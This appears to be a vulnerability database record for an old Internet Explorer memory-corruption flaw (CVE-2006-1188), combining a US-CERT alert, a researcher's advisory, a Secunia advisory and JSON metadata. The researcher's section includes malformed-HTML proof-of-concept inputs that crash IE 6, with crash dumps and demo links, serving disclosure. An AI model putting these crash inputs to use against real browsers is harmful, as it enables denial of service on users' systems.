Search criteria
618 vulnerabilities found for ie by microsoft
VAR-200604-0201
Vulnerability from variot - Updated: 2024-07-23 22:05Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA06-101A
Microsoft Windows and Internet Explorer Vulnerabilities
Original release date: April 11, 2006 Last revised: -- Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
For more complete information, refer to the Microsoft Security Bulletin Summary for April 2006.
I. (CVE-2006-0012)
II. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. An attacker may also be able to cause a denial of service.
III. Solution
Apply Updates
Microsoft has provided updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the US-CERT Vulnerability Notes for workarounds. Many of these vulnerabilities can be mitigated by following the instructions listed in the Securing Your Web Browser document.
Appendix A. Please send email to cert@cert.org with "TA06-101A Feedback VU#876678" in the subject.
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
Apr 11, 2006: Initial release
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt Cg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+ olQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM i+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I R+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh HAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA== =w6IC -----END PGP SIGNATURE----- .
Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Memory Corruption Vulnerability: #7d519030
Following HTML code forces IE 6 to crash:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
</h6 </ul
Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html
These are the register values and the ASM dump at the time of the access violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894
7d519012 55 push ebp 7d519013 8bec mov ebp,esp 7d519015 8b4104 mov eax,[ecx+0x4] 7d519018 394508 cmp [ebp+0x8],eax 7d51901b 7c09 jl mshtml+0x69026 (7d519026) 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb) 7d51901f 33c0 xor eax,eax 7d519021 40 inc eax 7d519022 5d pop ebp 7d519023 c20800 ret 0x8 7d519026 83c8ff or eax,0xffffffff 7d519029 ebf7 jmp mshtml+0x69022 (7d519022) 7d51902b 90 nop 7d51902c 90 nop 7d51902d 90 nop 7d51902e 90 nop 7d51902f 90 nopFAULT ->7d519030 8b4108 mov eax,[ecx+0x8] ds:0023:00000008=???????? 7d519033 85c0 test eax,eax 7d519035 7425 jz mshtml+0x6905c (7d51905c) 7d519037 8b10 mov edx,[eax] 7d519039 f6c210 test dl,0x10 7d51903c 7408 jz mshtml+0x69046 (7d519046) 7d51903e f6c220 test dl,0x20 7d519041 7519 jnz mshtml+0x6905c (7d51905c) 7d519043 8b400c mov eax,[eax+0xc] 7d519046 8b4808 mov ecx,[eax+0x8] 7d519049 85c9 test ecx,ecx
o Memory Corruption Vulnerability: #7d529d35
Following HTML code forces IE 6 to crash:
Show details on source website<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
</code
</style </td </label </bdo </th </object
Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html
These are the register values and the ASM dump at the time of the access violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778
7d529d0e e811170000 call mshtml+0x7b424 (7d52b424) 7d529d13 85c0 test eax,eax 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2 (7d5aede0) 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8] 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80] 7d529d26 5e pop esi 7d529d27 5d pop ebp 7d529d28 c20c00 ret 0xc 7d529d2b 90 nop 7d529d2c 90 nop 7d529d2d 90 nop 7d529d2e 90 nop 7d529d2f 90 nop 7d529d30 8bff mov edi,edi 7d529d32 55 push ebp 7d529d33 8bec mov ebp,espFAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14] ds:0023:00000014=?? 7d529d39 c1e004 shl eax,0x4 7d529d3c 0578aa4b7d add eax,0x7d4baa78 7d529d41 7410 jz mshtml+0x79d53 (7d529d53) 7d529d43 8b400c mov eax,[eax+0xc] 7d529d46 234508 and eax,[ebp+0x8] 7d529d49 f7d8 neg eax 7d529d4b 1bc0 sbb eax,eax 7d529d4d f7d8 neg eax 7d529d4f 5d pop ebp 7d529d50 c20400 ret 0x4 7d529d53 33c0 xor eax,eax 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)
o Vulnerable versions:
The DoS vulnerability was successfully tested on:
MS IE 6 SP2 - Win XP Pro SP2 MS IE 6 - Win 2k SP4
o Disclosure Timeline:
xx Feb 06 - Vulnerabilities discovered. 08 Mar 06 - Vendor contacted. 22 Mar 06 - Vendor confirmed vulnerabilities. 25 May 06 - Public release.
o Solution:
Install the latest security update (MS06-013) for Internet Explorer [2].
o Credits:
Thomas Waldegger bugtraq@morph3us.org BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq@morph3us.org' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me.
Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa.
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/
TITLE: Microsoft Design Tools msdds.dll Code Execution Vulnerability
SECUNIA ADVISORY ID: SA16480
VERIFY ADVISORY: http://secunia.com/advisories/16480/
CRITICAL: Highly critical
IMPACT: System access
WHERE:
From remote
SOFTWARE: Microsoft Visual Studio .NET 2003 http://secunia.com/product/1086/ Microsoft Office 2003 Student and Teacher Edition http://secunia.com/product/2278/ Microsoft Office 2003 Standard Edition http://secunia.com/product/2275/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/ Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 6.x http://secunia.com/product/11/ Microsoft Office 2003 Professional Edition http://secunia.com/product/2276/ Microsoft Office 2003 Small Business Edition http://secunia.com/product/2277/
DESCRIPTION: A vulnerability has been reported in Microsoft Visual Studio .NET, which potentially can be exploited by malicious people to compromise a vulnerable system.
The COM object is known to be installed as part of the following products: * Microsoft Visual Studio .NET 2003 * Microsoft Office Professional 2003
Other products may also include the affected COM object.
NOTE: An exploit has been published. However, there are currently conflicting reports about the exploitability of this issue. Some reports confirm that code execution is possible, while other reports indicate that the problem can't be reproduced. Secunia has currently not been able to reproduce the vulnerability in version 7.10.3077.0 of the COM object.
This advisory will be updated when more information is available.
SOLUTION: Restrict use of ActiveX controls to trusted web sites only.
PROVIDED AND/OR DISCOVERED BY: Reported by anonymous person.
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200604-0201",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 7.2,
"vendor": "microsoft",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.2.3"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "none"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(itanium)"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "sp3"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:preview:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.1:*:mac_os:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.2.3:*:macintosh:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thomas Waldegger\u203b bugtraq@morph3us.org",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
}
],
"trust": 0.6
},
"cve": "CVE-2006-1188",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2006-1188",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-17296",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-1188",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#876678",
"trust": 0.8,
"value": "35.63"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#680526",
"trust": 0.8,
"value": "28.35"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#984473",
"trust": 0.8,
"value": "23.01"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#824324",
"trust": 0.8,
"value": "13.77"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#641460",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#341028",
"trust": 0.8,
"value": "32.40"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#434641",
"trust": 0.8,
"value": "25.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#740372",
"trust": 0.8,
"value": "10.13"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#939605",
"trust": 0.8,
"value": "44.55"
},
{
"author": "CNNVD",
"id": "CNNVD-200604-164",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-17296",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n\n National Cyber Alert System\n\n Technical Cyber Security Alert TA06-101A\n\n\nMicrosoft Windows and Internet Explorer Vulnerabilities\n\n Original release date: April 11, 2006\n Last revised: --\n Source: US-CERT\n\n\nSystems Affected\n\n * Microsoft Windows\n * Microsoft Internet Explorer\n\n For more complete information, refer to the Microsoft Security\n Bulletin Summary for April 2006. \n\n\nI. \n (CVE-2006-0012)\n\n\nII. If the user is logged on with\n administrative privileges, the attacker could take complete control of\n an affected system. An attacker may also be able to cause a denial of\n service. \n\n\nIII. Solution\n\nApply Updates\n\n Microsoft has provided updates for these vulnerabilities in the\n Security Bulletins and on the Microsoft Update site. \n\nWorkarounds\n\n Please see the US-CERT Vulnerability Notes for workarounds. Many of\n these vulnerabilities can be mitigated by following the instructions\n listed in the Securing Your Web Browser document. \n\nAppendix A. Please send\n email to \u003ccert@cert.org\u003e with \"TA06-101A Feedback VU#876678\" in the\n subject. \n ____________________________________________________________________\n\n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n ____________________________________________________________________\n\n Produced 2006 by US-CERT, a government organization. \n\n Terms of use:\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n ____________________________________________________________________\n\n\nRevision History\n\n Apr 11, 2006: Initial release\n\n\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt\nCg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+\nolQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM\ni+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I\nR+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh\nHAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA==\n=w6IC\n-----END PGP SIGNATURE-----\n. \n\nVisit http://www.microsoft.com/windows/ie/default.mspx or\nhttp://en.wikipedia.org/wiki/Internet_Explorer for detailed information. \n\no Memory Corruption Vulnerability: \u003cmshtml.dll\u003e#7d519030\n=================================\n\nFollowing HTML code forces IE 6 to crash:\n\u003e \u003c!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"\n\u003e \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"\u003e\n\u003e \u003chtml\u003e \u003cfieldset\u003e \u003ch4\u003e\n\u003e \u003cpre\u003e\u003ctd\u003e\n\u003e \u003cmenu\u003e\n\u003e \u003clegend\u003e\n\u003e \u003ca\u003e\n\u003e \u003cul\u003e\n\u003e \u003csmall\u003e\n\u003e \u003cfieldset\u003e\n\u003e \u003ch6\u003e\n\u003e \u003c/h6\n\u003e \u003c/u\u003e\n\u003e \u003c/optgroup\u003e\n\u003e \u003c/tr\u003e\n\u003e \u003c/map\u003e\n\u003e \u003c/ul\n\u003e \u003c/dfn\u003e\n\u003e\n\u003e \u003c/del\u003e\n\u003e \u003c/h2\u003e\n\u003e \u003c/dir\u003e\n\u003e \u003c/ul\u003e\n\nOnline-demo:\nhttp://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html\n\nThese are the register values and the ASM dump at the time of the access\nviolation:\n\u003e eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000\n\u003e edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894\n\u003e\n\u003e 7d519012 55 push ebp\n\u003e 7d519013 8bec mov ebp,esp\n\u003e 7d519015 8b4104 mov eax,[ecx+0x4]\n\u003e 7d519018 394508 cmp [ebp+0x8],eax\n\u003e 7d51901b 7c09 jl mshtml+0x69026 (7d519026)\n\u003e 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb)\n\u003e 7d51901f 33c0 xor eax,eax\n\u003e 7d519021 40 inc eax\n\u003e 7d519022 5d pop ebp\n\u003e 7d519023 c20800 ret 0x8\n\u003e 7d519026 83c8ff or eax,0xffffffff\n\u003e 7d519029 ebf7 jmp mshtml+0x69022 (7d519022)\n\u003e 7d51902b 90 nop\n\u003e 7d51902c 90 nop\n\u003e 7d51902d 90 nop\n\u003e 7d51902e 90 nop\n\u003e 7d51902f 90 nop\n\u003e FAULT -\u003e7d519030 8b4108 mov eax,[ecx+0x8]\n\u003e ds:0023:00000008=????????\n\u003e 7d519033 85c0 test eax,eax\n\u003e 7d519035 7425 jz mshtml+0x6905c (7d51905c)\n\u003e 7d519037 8b10 mov edx,[eax]\n\u003e 7d519039 f6c210 test dl,0x10\n\u003e 7d51903c 7408 jz mshtml+0x69046 (7d519046)\n\u003e 7d51903e f6c220 test dl,0x20\n\u003e 7d519041 7519 jnz mshtml+0x6905c (7d51905c)\n\u003e 7d519043 8b400c mov eax,[eax+0xc]\n\u003e 7d519046 8b4808 mov ecx,[eax+0x8]\n\u003e 7d519049 85c9 test ecx,ecx\n\no Memory Corruption Vulnerability: \u003cmshtml.dll\u003e#7d529d35\n=================================\n\nFollowing HTML code forces IE 6 to crash:\n\u003e \u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\u003e \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n\u003e \u003cbdo\u003e\n\u003e \u003c/span\u003e\n\u003e \u003cpre\u003e\n\u003e\n\u003e \u003cparam\u003e\n\u003e \u003cform\u003e\n\u003e \u003ccolgroup\u003e\n\u003e \u003csmall\u003e\n\u003e \u003c/small\u003e\n\u003e \u003c/colgroup\u003e\n\u003e \u003c/map\u003e\n\u003e \u003c/button\u003e\n\u003e \u003c/code\n\u003e\n\u003e \u003cblockquote\u003e\n\u003e \u003cth\u003e\n\u003e \u003csmall\u003e\n\u003e\n\u003e \u003c/tbody\u003e\n\u003e \u003c/tr\u003e\n\u003e \u003c/ol\u003e\n\u003e \u003c/tbody\u003e\n\u003e \u003c/ol\u003e\n\u003e \u003c/code\u003e\n\u003e \u003c/strong\u003e\n\u003e\n\u003e\n\u003e \u003chead\u003e\n\u003e \u003cfieldset\u003e\n\u003e \u003cstyle\u003e\n\u003e\n\u003e \u003c/style\n\u003e \u003c/dir\u003e\n\u003e \u003c/a\u003e\n\u003e \u003c/td\n\u003e \u003c/li\u003e\n\u003e \u003c/label\n\u003e \u003c/object\u003e\n\u003e 